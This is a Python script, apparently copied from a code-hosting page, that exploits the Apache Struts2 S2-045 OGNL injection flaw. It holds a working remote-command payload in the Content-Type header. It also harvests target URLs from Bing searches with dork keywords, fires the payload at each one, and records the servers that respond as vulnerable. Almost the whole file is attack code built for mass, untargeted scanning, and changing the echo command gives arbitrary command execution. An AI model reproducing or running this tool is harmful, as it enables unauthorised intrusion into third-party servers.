1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
| # encoding:utf-8
import sys,requests
from bs4 import BeautifulSoup
keyword = {}
with open("keyword.txt") as f:
i = 0
for keywordLine in f:
keyword[str(i)] = keywordLine.strip()
i += 1
usage = '''
usage : python s2-045.py 0 10
first parameter is your filename
second parameter is your keyword's number which will be used by Bing
Third parameter is the page number you want to crawl\n'''
def poc(actionURL):
data = '--447635f88b584ab6b8d9c17d04d79918\
Content-Disposition: form-data; name="image1"\
Content-Type: text/plain; charset=utf-8\
\
x\
--447635f88b584ab6b8d9c17d04d79918--'
header = {
"Content-Length" : "155",
"User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",
"Content-Type" : "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo hereisaexp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
}
try:
request = requests.post(actionURL, data=data, headers=header, timeout = 10)
except:
return "None", "Refused"
return request.text, request.status_code
def returnURLList():
keywordsBaseURL = 'http://cn.bing.com/search?q=' +keyword[sys.argv[1]]+ '&first='
n =0
i = 1
while n < int(sys.argv[2]):
baseURL = keywordsBaseURL + str(i)
try:
req = requests.get(baseURL)
soup = BeautifulSoup(req.text, "html.parser")
text = soup.select('li.b_algo > h2 > a')
if '.action' in keyword[sys.argv[1]]:
standardURL = [url['href'][:url['href'].index('.action')]+'.action' for url in text if '.action' in url['href']]
elif '.do' in keyword[sys.argv[1]]:
standardURL = [url['href'][:url['href'].index('.do')]+'.do' for url in text if '.do' in url['href']]
else:
standardURL = [url['href'] for url in text]
except:
print("HTTPERROR")
continue
i += 10
n += 1
yield standardURL
def main():
if len(sys.argv) != 3:
print(usage)
for k,v in keyword.items():
print("%s is %s"%(k, v))
sys.exit()
for urlList in returnURLList():
for actionURL in urlList:
text, code = poc(actionURL)
if 'hereisaexp' in text:
print(str(code) + "----Successful----" + actionURL + '\n')
with open("AvailableURL.txt","a") as f:
f.write(actionURL+'\n')
else:
print(str(code)+'----'+actionURL+'\n')
if __name__ == '__main__':
main()
|